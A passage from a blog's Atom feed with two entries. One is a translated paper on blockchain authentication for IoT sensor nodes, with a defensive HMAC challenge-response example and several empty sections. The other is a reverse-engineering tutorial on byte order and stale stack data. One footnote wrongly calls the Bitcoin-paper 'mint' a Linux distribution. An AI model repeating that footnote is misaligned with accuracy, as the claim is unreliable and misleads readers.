<p>2、逆向安全</p>
<p>3、移动通信安全</p>
<h4 id="题型:"><a href="#题型:" class="headerlink" title="题型:"></a><strong>
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>P2P networking based internet of things (IoT) sensor node authentication by Blockchain</title>
<link href="https://singlemindedt.github.io/2020/05/29/P2P%20networking%20based%20internet%20of%20things%20(IoT)%20sensor%20node%20authentication%20by%20Blockchain(%E5%9F%BA%E4%BA%8EP2P%E7%BD%91%E7%BB%9C%E7%9A%84%E7%89%A9%E8%81%94%E7%BD%91%EF%BC%88IoT%EF%BC%89%E4%BC%A0%E6%84%9F%E5%99%A8%E8%8A%82%E7%82%B9%E5%8C%BA%E5%9D%97%E9%93%BE%E8%AE%A4%E8%AF%81)/"/>
<id>https://singlemindedt.github.io/2020/05/29/P2P networking based internet of things (IoT) sensor node authentication by Blockchain(基于P2P网络的物联网(IoT)传感器节点区块链认证)/</id>
<published>2020-05-29T10:20:08.000Z</published>
<updated>2020-07-29T11:05:24.949Z</updated>
<content type="html"><![CDATA[<h2 id="P2P-networking-based-internet-of-things-IoT-sensor-node-authentication-by-Blockchain-基于P2P网络的物联网(IoT)传感器节点区块链认证"><a href="#P2P-networking-based-internet-of-things-IoT-sensor-node-authentication-by-Blockchain-基于P2P网络的物联网(IoT)传感器节点区块链认证" class="headerlink" title="P2P networking based internet of things (IoT) sensor node authentication by Blockchain(基于P2P网络的物联网(IoT)传感器节点区块链认证)"></a>P2P networking based internet of things (IoT) sensor node authentication by Blockchain</h2><h3 id="Abstract"><a href="#Abstract" class="headerlink" title="Abstract"></a>Abstract</h3><p>Sensor nodes play an important role in the IoT environment, and the sensors form a peer-to-peer network. Because their physical size is limited, IoT sensor nodes must use lightweight authentication protocols. The Internet of Things (IoT) is a collection of diverse technological elements; interworking between heterogeneous terminals, networks and applications is expected, and it will be accelerated by the opening of IoT platforms. As a result, many technical and administrative security threats will appear in the IoT environment, so sensor node protocols must be both lightweight and secure. IoT devices serve many purposes: devices that need performance run an operating system on a high-performance chipset and can run most cryptographic protocols, whereas lightweight IoT devices that perform simple tasks, such as switching a light on or off, are built on low-performance chipsets that run no OS. If cryptographic protocols or certificates are not supported, such a device is vulnerable to attack and lacks the performance to handle them. This paper therefore proposes a blockchain-based scheme for more secure authentication of IoT devices.</p><p><strong>Keywords</strong>: P2P networking . Sensor network . Secure IoT . Node authentication . Light-weight protocol . Network security</p><h3 id="1-Introduction"><a href="#1-Introduction" class="headerlink" title="1 Introduction"></a>1 Introduction</h3><p>Internet of Things (IoT) services are exposed to a variety of security threats that stem from the nature of IoT technology itself. In particular, IoT devices have limited hardware specifications (low power consumption, little memory, low memory bandwidth and so on) and tend to be deployed in environments that are hard to manage, which exposes them to many threats, including physical attack. These characteristics can cause fatal errors in the secure operation of an IoT service platform, or services being delivered on the basis of wrong information, so that the IoT service platform loses its function [1].</p><p>In recent years, interoperability between heterogeneous terminals, networks and applications is expected to accelerate through the opening of IoT platforms, bringing with it various technical and administrative security threats. The threats possible in the IoT environment inherit those of existing ICT (information and communication technology) environments. Confidentiality, integrity and availability, the three main components of information security commonly called the CIA triad, can be read as the categories of threat to the legitimate use and delivery of services [2]. Table 1 shows the security threats that can arise in each component of the IoT [3]. IoT devices therefore need an access-control method that protects the device through in-platform authentication of individual users and prevents arbitrary access by unauthorised users, across diverse environments, IoT service platforms and platform application services [4-6].</p><p>The security problems that can occur in today's IoT environment are surveyed in [3]. Many authentication protocols have been developed up to now, but most of them are vulnerable to location-tracking attacks, replay attacks or spoofing attacks [3], and researchers keep finding weaknesses and privacy violations in them [5]. This work therefore proposes a blockchain-based peer-to-peer authentication scheme, in which blocks are linked and secured with cryptography. Each block carries a hash pointer, usually serving as a link to the previous block, a timestamp and transaction data [11]. By design, a blockchain is inherently resistant to modification of its data.</p><p>Technically, a blockchain can act as "an open, distributed ledger that can record transactions between two parties efficiently and in a verifiable and permanent way" [12]. Used as a decentralised ledger, a blockchain is traditionally managed by a peer-to-peer network whose nodes collectively follow a protocol for validating new blocks. Once recorded, the data in a given block cannot be altered retroactively without altering all subsequent blocks, which requires the collusion of the network majority [13]. Blockchain is more secure than non-blockchain algorithms [26], but there is a trade-off between performance and security: if secure transactions matter more than efficiency, blockchain is the best solution for IoT communication. The rest of the paper is organised as follows. Section 2 discusses some existing protocols for wireless sensor networks (WSN); Sections 3 and 4 present the proposed algorithm in detail; Section 5 gives conclusions and future work.</p><h3 id="2-Related-work"><a href="#2-Related-work" class="headerlink" title="2 Related work"></a>2 Related work</h3><h4 id="2-1-Wireless-sensor-networks"><a href="#2-1-Wireless-sensor-networks" class="headerlink" title="2.1 Wireless sensor networks"></a>2.1 Wireless sensor networks</h4><p>WSNs can be applied widely, in areas such as real-time traffic monitoring, military data collection, seismic activity and dispersion measurement, and time-based pollution measurement. Because a WSN consists of very small sensors, it is constrained in storage, computation, energy and communication radius. Providing secure wireless communication is a very important problem: sensors may be exposed to harsh environments, wireless communication is easy to intercept, and a malicious attacker can tamper with messages or attempt retransmission (replay) attacks [10].</p><p>Various aspects of secure WSN communication have been studied. Owing to the characteristics of wireless networks, WSNs are highly vulnerable to attacks on the hardware of the sensor nodes (SN) as well as to node detection, damage, eavesdropping, denial-of-service attacks and routing attacks (for example sinkhole and wormhole attacks) [1].</p><p>Because of the limited nature of sensor nodes, existing WSN security technology is not easy to apply directly. Lightweight key-distribution and authentication schemes are therefore being studied to achieve security properties such as message integrity, confidentiality and node authentication.</p><p>Two approaches exist: adapting lightweight public-key cryptography, with its considerable computation, to fit sensor nodes; and protocols designed for low computational power and secure key distribution, such as μ-TESLA (the "micro" version of the Timed, Efficient, Streaming, Loss-tolerant Authentication protocol), LEAP (Localized Encryption and Authentication Protocol) and SPINS (Security Protocols for Sensor Networks) [24] [22].</p><p>PIKE (Peer Intermediaries for Key Establishment) [25] proposes a key-distribution scheme for securing the network that is based on symmetric keys. 
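</p><p>A lightweight symmetric-key node authentication of the kind the survey above refers to, as an added example that is not part of the paper: a sensor node and its base station share a pre-installed 16-byte key and run an HMAC-SHA256 challenge-response. The base station verifies the node's response, derives a per-session key from the two nonces, and refuses a replayed response, which is the retransmission attack the text mentions, as well as a tampered one. The node id, the key, the frame layout and the class names <code>SensorNode</code> and <code>BaseStation</code> are this example's own assumptions, not from the paper.</p>

```python
"""Symmetric-key challenge-response for a WSN node (added example, not from the paper).

Both sides hold a pre-installed 16-byte key K. The base station (BS) sends a nonce;
the node answers with  id || node_nonce || HMAC(K, id || bs_nonce || node_nonce).
The BS checks the tag, derives a session key from both nonces and remembers
used node nonces so that a replayed response is rejected.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional, Set, Tuple

# Constructed sample data (hypothetical node id and pre-shared key).
NODE_ID = b"\x0a\x01"
PRESHARED_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")


def mac(key: bytes, *parts: bytes) -> bytes:
    """HMAC-SHA256 over the concatenated parts, truncated to an 8-byte tag.
    A short tag keeps radio frames small, as the lightweight protocols in the survey do."""
    return hmac.new(key, b"".join(parts), hashlib.sha256).digest()[:8]


def derive_session_key(key: bytes, bs_nonce: bytes, node_nonce: bytes) -> bytes:
    """Session key = HMAC(K, "session" || nonces); the long-term key itself is never used for traffic."""
    return hmac.new(key, b"session" + bs_nonce + node_nonce, hashlib.sha256).digest()[:16]


class SensorNode:
    def __init__(self, node_id: bytes, key: bytes) -> None:
        self.node_id, self.key = node_id, key

    def respond(self, bs_nonce: bytes, node_nonce: Optional[bytes] = None) -> bytes:
        """Build the response frame: id(2) || node_nonce(8) || tag(8)."""
        node_nonce = node_nonce or os.urandom(8)
        tag = mac(self.key, self.node_id, bs_nonce, node_nonce)
        return self.node_id + node_nonce + tag


class BaseStation:
    def __init__(self, keys: Dict[bytes, bytes]) -> None:
        self.keys = keys                                   # node_id -> pre-shared key
        self.seen_nonces: Set[Tuple[bytes, bytes]] = set()  # replay cache: (node_id, node_nonce)
        self.pending: Dict[bytes, bytes] = {}              # node_id -> outstanding challenge

    def challenge(self, node_id: bytes, bs_nonce: Optional[bytes] = None) -> bytes:
        bs_nonce = bs_nonce or os.urandom(8)
        self.pending[node_id] = bs_nonce
        return bs_nonce

    def verify(self, frame: bytes) -> Optional[bytes]:
        """Return the session key on success, None on any failure (no reason is leaked to the sender)."""
        if len(frame) != 2 + 8 + 8:
            return None
        node_id, node_nonce, tag = frame[:2], frame[2:10], frame[10:]
        key = self.keys.get(node_id)
        bs_nonce = self.pending.get(node_id)
        if key is None or bs_nonce is None:
            return None                      # unknown node, or no challenge outstanding
        if (node_id, node_nonce) in self.seen_nonces:
            return None                      # replayed response
        expected = mac(key, node_id, bs_nonce, node_nonce)
        if not hmac.compare_digest(expected, tag):
            return None                      # forged or tampered frame
        self.seen_nonces.add((node_id, node_nonce))
        del self.pending[node_id]            # one response per challenge
        return derive_session_key(key, bs_nonce, node_nonce)


def demo() -> Tuple[bool, bool, bool]:
    """One honest exchange, one replay of it, one tampered frame; returns whether each was accepted."""
    bs = BaseStation({NODE_ID: PRESHARED_KEY})
    node = SensorNode(NODE_ID, PRESHARED_KEY)

    frame = node.respond(bs.challenge(NODE_ID))
    honest_ok = bs.verify(frame) is not None

    bs.challenge(NODE_ID)                    # fresh challenge; attacker replays the old frame
    replay_ok = bs.verify(frame) is not None

    bs.challenge(NODE_ID)
    tampered = bytearray(node.respond(bs.pending[NODE_ID]))
    tampered[-1] ^= 0x01                     # flip one bit of the tag
    tamper_ok = bs.verify(bytes(tampered)) is not None
    return honest_ok, replay_ok, tamper_ok


if __name__ == "__main__":
    print("accepted (honest, replay, tampered):", demo())
```

<p>The replay cache is what distinguishes this from a bare MAC check: the tag on the replayed frame is still valid for the old challenge, so only the record of already-used node nonces (together with the fresh base-station nonce) stops it. On a real node the cache would be bounded, for example by a per-node counter in place of a random nonce.</p><p>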
In addition, ID-based schemes that need no key distribution, and schemes with an advantage in message-transmission frequency, are also being studied.</p><p>Because of the nature of wireless communication, a weakness of WSNs is that messages are easily eavesdropped [7]. To prevent this, confidentiality has to be ensured by encrypting data before it is exchanged.</p><p>To generate authentication keys, all SNs communicate directly with the base station (BS). In practice direct communication between an SN and the BS is difficult.</p><p>If a node with limited energy tries to communicate directly with a remote BS, its energy consumption rises through sending and receiving authentication messages, and a node that spends its energy this way cannot take part in communication for long [10].</p><h3 id="2-2-Light-weight-sensor-networks-protocols"><a href="#2-2-Light-weight-sensor-networks-protocols" class="headerlink" title="2.2 Light-weight sensor networks protocols"></a>2.2 Light-weight sensor networks protocols</h3><p>Several lightweight protocols based on public keys exist; μ-TESLA [21], LEAP [22] and SPINS [23] are designed for low computational power and secure key distribution. Sensor nodes play an important role in the IoT environment; they are the key to the IoT, so many researchers focus on the attack resistance of sensor nodes and on efficient communication protocols.</p><p>The IoT has several problems, detailed below.</p><p>The IoT is based on ICT (information and communication technology): an intelligent environment in which information is passed between users and objects, and between objects, through their connections.</p><p>The US market-research firm Gartner selected the IoT as the technology area attracting the most attention [8]. The IoT divides into three broad areas: the device area (terminals/sensors), the network area (wired/wireless) and the service-interface area (platforms/applications). The device area collects data from a specific object and transfers it to another object using the communication function embedded in the object. The network area is the wired/wireless channel that carries data between user and object, or object and object. The service-interface area processes data into information and controls and manages the various devices.</p><h3 id="2-3-Vulnerability-on-IoT"><a href="#2-3-Vulnerability-on-IoT" class="headerlink" title="2.3 Vulnerability on IoT"></a>2.3 Vulnerability on IoT</h3><p>A spoofing attack is one in which the attacker impersonates a legitimate server in the sensor network, or a client issuing an authentication request, continues the protocol run and illegitimately obtains the authentication key of a sensor or user. A replay (retransmission) attack is one in which elements used in the authentication process between entities of the sensor network are stored and reused in a later authentication run [9].</p><p>An authentication-key guessing attack is one in which the attacker eavesdrops on or impersonates the user-to-sensor and sensor-to-sensor authentication process in the sensor network, stores the elements sent and received, and finds a key identical to the finally agreed authentication key [22].</p><p>A denial-of-service attack is one in which the attacker takes part in the authentication process and intercepts responses, so that even when a sensor or user requests authentication the attacker can answer, thereby denying the authentication service.</p><p>A privacy violation exposes the identity of a party taking part in communication from the elements sent and received during the authentication process on the sensor network.</p><h3 id="2-4Attack-model(攻击模型-)"><a href="#2-4Attack-model(攻击模型-)" class="headerlink" title="2.4 Attack model"></a>2.4 Attack model</h3><p>The attack model in this study can be a DoS attack. In a DoS attack the attacker tries to evade detection or to impersonate a legitimate IoT device by sending fake messages disguised as coming from a legitimate device. A similar situation can occur in peer-to-peer networks: a legitimate IoT node connects to other IoT devices, some of which may be legitimate while others are malicious. This may eventually cause network congestion and deny some IoT devices access to some data streams, and the problem then affects the IoT device authentication process. Compared with a centralised system, however, an attacker here is dealing with IoT devices that all hold the current state of the blockchain. It can therefore be concluded that in a peer-to-peer network in which a large number of IoT devices form the network and the blockchain, a DoS attack is hard to carry out in a way that compromises the security of the whole network.</p><h3 id="3-Blockchain-based-sensor-node-authentication"><a href="#3-Blockchain-based-sensor-node-authentication" class="headerlink" title="3 Blockchain-based sensor node authentication"></a>3 Blockchain-based sensor node authentication</h3><p>The authors should have sufficient background information to give the method proposed in this paper wider acceptance.</p><h4 id="3-1-Blockchain"><a href="#3-1-Blockchain" class="headerlink" title="3.1 Blockchain"></a>3.1 Blockchain</h4><p>Because anyone taking part in the use of a blockchain can enter, change or delete data, no TTP (trusted third party) needs to exist for transactions between mutually distrusting parties in the network. To validate such transactions a consensus algorithm is used, which guarantees the reliability of the data stored in the blockchain after a specific mechanism has run among the authorised users, thereby securely updating and maintaining the state of the blockchain. Fig. 1 defines an electronic coin as a chain of digital signatures: each owner transfers the coin to the next by digitally signing a hash of the previous transaction and the public key of the next owner, and appending these to the coin. The payee can verify the signatures to verify the chain of ownership [14]. As shown in Fig. 1, the blockchain consists of the value of the current block, the digital signature, the hash value of the current block, the block header with the Merkle root, and the block data made up of transactions.</p><p>Peer-to-Peer Netw. Appl. (2020) 13:579–589</p><p>The problem is that the payee cannot verify that one of the owners did not double-spend the coin. The common solution is to introduce a trusted central authority, a mint, that checks every transaction for double spending; after each transaction the coin must be returned to the mint.</p><p>We trust that no new coins are issued and that only coins issued directly by the mint<sup>1</sup> are reused. The problem with this solution is that the fate of the entire money system depends on the company running the mint, with every transaction having to go through it, just as with a bank. The payee has no way of knowing that the earlier owners did not sign an earlier transaction; the only way to confirm the absence of a transaction is to be aware of all transactions. In the mint-based model the mint knows all transactions and decides which one arrived first. To accomplish this without a trusted party, transactions must be publicly announced, and for each transaction the majority of nodes must agree that it was the first received [14].</p><p>Fig. 1 Blockchain in transactions</p><p><sup>1</sup> Mint is a Linux distribution based on Debian and Ubuntu that is easy to adopt.</p><p>A block of the blockchain consists of a block header and a block body. The block header contains the hash value of the previous block header, so that all blocks are connected in the manner of a linked list, and it includes an arbitrary random nonce for the consensus algorithm and the bits that adjust the block-generation difficulty. The block body can hold different values depending on the service supported: in Bitcoin, a digital cryptosystem, the block body contains the transactions that occurred between users over about 10 minutes. Blockchains can be divided into three categories: public, private and consortium blockchains [15]. Each block body is structurally very similar, but the three have different concepts and functions, and each blockchain has its own prerequisites for definition and implementation. A public blockchain is one for general use, such as Bitcoin; private and consortium blockchains apply the blockchain to other purposes.</p><h4 id="3-2-Conventional-IoT-sensor-nodes-authentication-types"><a href="#3-2-Conventional-IoT-sensor-nodes-authentication-types" class="headerlink" title="3.2 Conventional IoT sensor nodes authentication types"></a>3.2 Conventional IoT sensor nodes authentication types</h4><p>In the IoT environment an attacker disguised as an IoT device gains access to the internal IoT environment through attacks such as spoofing, replay and DoS.</p><p>Five types of authentication protocol are used in existing IoT environments. Table 1 shows the advantages and disadvantages of each authentication technique [15].</p><h4 id="3-2-1-ID-based-authentication"><a href="#3-2-1-ID-based-authentication" class="headerlink" title="3.2.1 ID-based authentication"></a>3.2.1 ID-based authentication</h4><p>ID-based authentication provides digital signatures and authentication by using the user's e-mail address, name or IP address as the public key of a public-key cryptosystem. No pre-distributed key is needed, the amount of computation is small and the key length is comparatively short. It is, however, vulnerable to ID spoofing attacks. Examples are the Hess scheme, the Lynn scheme, the Gentry and Silverberg scheme, and various other authentication schemes [15].</p><h4 id="3-2-2-Certificate-based-authentication"><a href="#3-2-2-Certificate-based-authentication" class="headerlink" title="3.2.2 Certificate-based authentication"></a>3.2.2 Certificate-based authentication</h4><p>Certificate-based authentication uses the digital signatures of a public-key cryptosystem: the information used for the electronic signature is recorded in a certificate, and authentication is performed on that basis. In Korea, the issuance system and the management of authorised certificates were established under the Digital Signature Act of 1999, with certificates issued by a root CA, the top-level certification authority, through five authorised certification bodies. Abroad, Verisign's device-authentication services cover personal devices, cable-modem device authentication and WiMAX industry certification. Certificate-based authentication is also used in VoIP, network surveillance cameras and other fields, and its use is gradually expanding.</p><p>Certificate-based authentication provides high security through strong authentication and offers non-repudiation. However, the software and algorithms that process device certificates require high computational throughput, so it is unsuitable for low-power, low-performance IoT devices.</p><h4 id="3-2-3-Cryptography-protocol-based"><a href="#3-2-3-Cryptography-protocol-based" class="headerlink" title="3.2.3 Cryptography protocol based"></a>3.2.3 Cryptography protocol based</h4><h4 id="3-2-4-MAC-address-based-authentication"><a href="#3-2-4-MAC-address-based-authentication" class="headerlink" title="3.2.4 MAC address based authentication"></a>3.2.4 MAC address based authentication</h4><h4 id="3-2-5-ID-password-based-authentication"><a href="#3-2-5-ID-password-based-authentication" class="headerlink" title="3.2.5 ID/password-based authentication"></a>3.2.5 ID/password-based authentication</h4><h3 id="4-Proposed-P2P-networking-based-IoT-sensor-authentication-by-Blockchain"><a href="#4-Proposed-P2P-networking-based-IoT-sensor-authentication-by-Blockchain" class="headerlink" title="4 Proposed P2P networking based IoT sensor authentication by Blockchain"></a>4 Proposed P2P networking based IoT sensor authentication by Blockchain</h3><h4 id="4-1-Requirements"><a href="#4-1-Requirements" class="headerlink" title="4.1 Requirements"></a>4.1 Requirements</h4><h4 id="4-2-Device-authentication-method"><a href="#4-2-Device-authentication-method" class="headerlink" title="4.2 Device authentication method"></a>4.2 Device authentication method</h4><h4 id="4-3-Hacking-scenario-on-IoT-authentication"><a href="#4-3-Hacking-scenario-on-IoT-authentication" class="headerlink" title="4.3 Hacking scenario on IoT authentication"></a>4.3 Hacking scenario on IoT authentication</h4><h5 id="4-3-1-Jamming-attack-assumption"><a href="#4-3-1-Jamming-attack-assumption" class="headerlink" title="4.3.1 Jamming attack assumption"></a>4.3.1 Jamming attack assumption</h5><h4 id="4-4-Proposed-IoT-authentication-by-Blockchain"><a href="#4-4-Proposed-IoT-authentication-by-Blockchain" class="headerlink" title="4.4 Proposed IoT authentication by Blockchain"></a>4.4 Proposed IoT authentication by Blockchain</h4><h4 id="4-5-Proposed-IoT-multiple-level-node-authentication-model"><a href="#4-5-Proposed-IoT-multiple-level-node-authentication-model" class="headerlink" title="4.5 Proposed IoT multiple-level node authentication model"></a>4.5 Proposed IoT multiple-level node authentication model</h4><h3 id="5-Conclusions"><a href="#5-Conclusions" class="headerlink" title="5 Conclusions"></a>5 Conclusions</h3>]]></content>
<summary type="html">
<h2 id="P2P-networking-based-internet-of-things-IoT-sensor-node-authentication-by-Blockchain-基于P2P网络的物联网(IoT)传感器节点区块链认证"><a href="#P2P-netwo
</summary>
<category term="translation" scheme="https://singlemindedt.github.io/tags/translation/"/>
</entry>
<entry>
<title>简单逆向</title>
<link href="https://singlemindedt.github.io/2020/05/11/%E7%AE%80%E5%8D%95%E9%80%86%E5%90%91/"/>
<id>https://singlemindedt.github.io/2020/05/11/简单逆向/</id>
<published>2020-05-11T08:32:31.000Z</published>
<updated>2020-05-14T17:03:28.570Z</updated>
<content type="html"><![CDATA[<h2 id="程序一、字节序"><a href="#程序一、字节序" class="headerlink" title="Program 1: byte order"></a>Program 1: byte order</h2><h3 id="程序源码"><a href="#程序源码" class="headerlink" title="Source"></a>Source</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line">#include "windows.h"</span><br><span class="line">BYTE  b   = 0x12;      // 1 byte</span><br><span class="line">WORD  w   = 0x1234;    // 2 bytes</span><br><span class="line">DWORD dw  = 0x123456;  // 4 bytes, i.e. 0x00123456</span><br><span class="line">char  str[] = "abcde"; // 6 bytes including the terminating NUL</span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line">    BYTE  lb   = b;    // copies of the globals become locals on main's stack frame</span><br><span class="line">    WORD  lw   = w;</span><br><span class="line">    DWORD ldw  = dw;</span><br><span class="line">    char *lstr = str;  // only the pointer is copied; the characters stay in the data section</span><br><span class="line">    return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><h3 id="补充"><a href="#补充" class="headerlink" title="Background"></a>Background</h3><p><strong>Little endian</strong>: the low byte is stored at the low address and the high byte at the high address, so the integer 0x01234567 stored at address 0x100 looks like this:</p><table><thead><tr><th>Address</th><th>…</th><th>0x100</th><th>0x101</th><th>0x102</th><th>0x103</th><th>…</th></tr></thead><tbody><tr><td>Value</td><td>…</td><td>0x67</td><td>0x45</td><td>0x23</td><td>0x01</td><td>…</td></tr></tbody></table><p><strong>Big endian</strong>: the high byte is stored at the low address and the low byte at the high address (the order in which a human writes the number):</p><table><thead><tr><th>Address</th><th>…</th><th>0x100</th><th>0x101</th><th>0x102</th><th>0x103</th><th>…</th></tr></thead><tbody><tr><td>Value</td><td>…</td><td>0x01</td><td>0x23</td><td>0x45</td><td>0x67</td><td>…</td></tr></tbody></table><p>+++</p><h3 id="代码分析"><a href="#代码分析" class="headerlink" title="Analysis"></a>Analysis</h3><p>Byte layout of the four globals in memory (<code>dw</code> is 0x123456, i.e. 0x00123456 as a 4-byte value):</p><table><thead><tr><th>Type</th><th>Name</th><th>Size</th><th>Big-endian layout</th><th>Little-endian layout</th></tr></thead><tbody><tr><td>BYTE</td><td>b</td><td>1</td><td>[12]</td><td>[12]</td></tr><tr><td>WORD</td><td>w</td><td>2</td><td>[12] [34]</td><td>[34] [12]</td></tr><tr><td>DWORD</td><td>dw</td><td>4</td><td>[00] [12] [34] [56]</td><td>[56] [34] [12] [00]</td></tr><tr><td>char[]</td><td>str</td><td>6</td><td>[61] [62] [63] [64] [65] [00]</td><td>[61] [62] [63] [64] [65] [00]</td></tr></tbody></table><blockquote><ul><li><p>A <code>char[]</code> array is a sequence of single bytes stored contiguously, so its layout is the same under both byte orders.</p></li><li><p>x86 CPUs are little-endian.</p></li><li><p>PowerPC is big-endian.</p></li><li><p>Network protocols use big-endian (big-endian is therefore also called network byte order).</p></li></ul></blockquote><p>+++</p><h3 id="调试"><a href="#调试" class="headerlink" title="Debugging"></a>Debugging</h3><blockquote><p>Environment: x32dbg</p></blockquote><p>Assembly of <code>main</code>:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwPYQ.png" alt="YBwPYQ.png"><br>The stack when execution reaches <code>leave</code> at <strong>0x4013EB</strong>:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwpTS.png" alt="YBwpTS.png"><br>The corresponding stack frame:</p><table><thead><tr><th>Slot</th><th>Address</th><th>Value (dword)</th></tr></thead><tbody><tr><td>ESP</td><td>0022FF40</td><td>00401920</td></tr><tr><td>lstr (pointer to str)</td><td>0022FF44</td><td>00402008</td></tr><tr><td>ldw</td><td>0022FF48</td><td>00123456</td></tr><tr><td>lw and lb</td><td>0022FF4C</td><td>12FD1234</td></tr><tr><td></td><td>0022FF50</td><td>0000000A</td></tr><tr><td></td><td>0022FF54</td><td>00000002</td></tr><tr><td>saved EBP</td><td>0022FF58</td><td>0022FFF0</td></tr><tr><td>return address</td><td>0022FF5C</td><td>004010FD</td></tr></tbody></table><p>The debugger shows each dword already converted from little-endian, so <code>ldw</code> reads as <code>00123456</code> although the bytes at 0022FF48..4B are 56 34 12 00. The dword <code>12FD1234</code> at 0022FF4C packs two locals: <code>lw</code> = 0x1234 in the two bytes at 0022FF4C and 0022FF4D, a padding byte FD at 0022FF4E, and <code>lb</code> = 0x12 at 0022FF4F.</p><p>Register state: <code>EAX=0</code> reflects the <code>return 0</code> statement.</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwiWj.png" alt="YBwiWj.png"><br>+++</p><h2 id="程序二、栈的脏数据"><a href="#程序二、栈的脏数据" class="headerlink" title="Program 2: stale data on the stack"></a>Program 2: stale data on the stack</h2><h3 id="程序源码-1"><a href="#程序源码-1" class="headerlink" title="Source"></a>Source</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">void f1() {</span><br><span class="line">    int a = 1, b = 2, c = 3;   // written to f1's frame, never cleared on return</span><br><span class="line">}</span><br><span class="line">void f2() {</span><br><span class="line">    int a, b, c;               // uninitialised: whatever the same stack slots still hold</span><br><span class="line">    printf("a=%d,b=%d,c=%d\n", a, b, c);</span><br><span class="line">}</span><br><span class="line">int main() {</span><br><span class="line">    f1();</span><br><span class="line">    f2();</span><br><span class="line">    return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++<br><img src="https://s1.ax1x.com/2020/05/14/YBwCFg.png" alt="YBwCFg.png"></p><p>+++</p><h3 id="补充-1"><a href="#补充-1" class="headerlink" title="Background"></a>Background</h3><p>When a function returns, the local variables in its former stack space are <strong>not</strong> cleared automatically; they remain as stack <strong>noise</strong> or <strong>stale data</strong> that a later frame occupying the same addresses will see (reading them, as <code>f2</code> does, is undefined behaviour in C, which is why the compiler leaves them as they are).<br>+++</p><h3 id="调试-1"><a href="#调试-1" class="headerlink" title="Debugging"></a>Debugging</h3><blockquote><p>Environment: x32dbg</p></blockquote><p>Assembly of <strong>f1()</strong> and <strong>f2()</strong>:</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwkSs.png" alt="YBwkSs.png"><br>Stack layout when execution reaches <code>leave</code> at <strong>0x4013CB</strong> (all of <strong>f1()</strong>'s locals have been written):</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwSw8.png" alt="YBwSw8.png"><br>The corresponding stack frame:</p><table><thead><tr><th>Slot</th><th>Address</th><th>Value (dword)</th></tr></thead><tbody><tr><td>ESP</td><td>0022FF38</td><td>0022FFF0</td></tr><tr><td>c</td><td>0022FF3C</td><td>00000003</td></tr><tr><td>b</td><td>0022FF40</td><td>00000002</td></tr><tr><td>a</td><td>0022FF44</td><td>00000001</td></tr><tr><td>saved EBP</td><td>0022FF48</td><td>0022FF58</td></tr><tr><td>return address</td><td>0022FF4C</td><td>00401406</td></tr></tbody></table><p>Stack layout when execution reaches 0x4013F4 (the arguments of the <code>printf</code> call in <strong>f2()</strong> have been pushed):</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwAln.png" alt="YBwAln.png"><br>The corresponding stack frame:</p><table><thead><tr><th>Slot</th><th>Address</th><th>Value (dword)</th></tr></thead><tbody><tr><td>ESP (first printf argument, the format string)</td><td>0022FF20</td><td>00403064</td></tr><tr><td>f2 a</td><td>0022FF24</td><td>00000003</td></tr><tr><td>f2 b</td><td>0022FF28</td><td>0022FFF0</td></tr><tr><td>f2 c</td><td>0022FF2C</td><td>00401950</td></tr><tr><td></td><td>0022FF30</td><td>77C04E42</td></tr><tr><td></td><td>0022FF34</td><td>00401950</td></tr><tr><td></td><td>0022FF38</td><td>0022FFF0</td></tr><tr><td>f1 c</td><td>0022FF3C</td><td>00000003</td></tr><tr><td>f1 b</td><td>0022FF40</td><td>00000002</td></tr><tr><td>f1 a</td><td>0022FF44</td><td>00000001</td></tr><tr><td>saved EBP</td><td>0022FF48</td><td>0022FF58</td></tr><tr><td>return address</td><td>0022FF4C</td><td>0040140B</td></tr></tbody></table><p>The values of f1's locals (1, 2, 3) are still in place at 0022FF3C..0022FF44 after f1 has returned; the values f2 prints are whatever its own uninitialised slots happened to contain.</p><p>+++</p><h2 id="程序三、关于AT-amp-T和Intel"><a href="#程序三、关于AT-amp-T和Intel" class="headerlink" title="Program 3: AT&amp;T and Intel syntax"></a>Program 3: AT&amp;T and Intel syntax</h2><h3 id="程序源码-2"><a href="#程序源码-2" class="headerlink" title="Source"></a>Source</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line">    int i;</span><br><span class="line">    for (i = 0; i &lt; 10; i++)</span><br><span class="line">    {</span><br><span class="line">        printf("Hello,World\n");</span><br><span class="line">    }</span><br><span class="line">    return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Create the file test0.c in Kali and compile it; the disassembly is shown in both syntaxes below (gdb uses AT&amp;T syntax by default and switches with <code>set disassembly-flavor intel</code>).</p><p><img src="https://s1.ax1x.com/2020/05/14/YBwEyq.png" alt="YBwEyq.png"></p><h3 id="AT-amp-T语法"><a href="#AT-amp-T语法" class="headerlink" title="AT&amp;T syntax"></a>AT&amp;T syntax</h3><p><img src="https://s1.ax1x.com/2020/05/14/YBwemV.png" alt="YBwemV.png"></p><h3 id="Intel语法"><a href="#Intel语法" class="headerlink" title="Intel syntax"></a>Intel syntax</h3><p><img src="https://s1.ax1x.com/2020/05/14/YBwVO0.png" alt="YBwVO0.png"><br>+++</p><h2 id="程序四、linux下64,32"><a href="#程序四、linux下64,32" class="headerlink" title="Program 4: 64-bit and 32-bit on Linux"></a>Program 4: 64-bit and 32-bit on Linux</h2><h3 id="程序源码-3"><a href="#程序源码-3" class="headerlink" title="Source"></a>Source</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">void test_function(int a, int b, int c, int d)</span><br><span class="line">{</span><br><span class="line">    int flag;</span><br><span class="line">    char buffer[10];</span><br><span class="line">    flag = 31337;</span><br><span class="line">    buffer[0] = 'A';</span><br><span class="line">}</span><br><span class="line">int main()</span><br><span 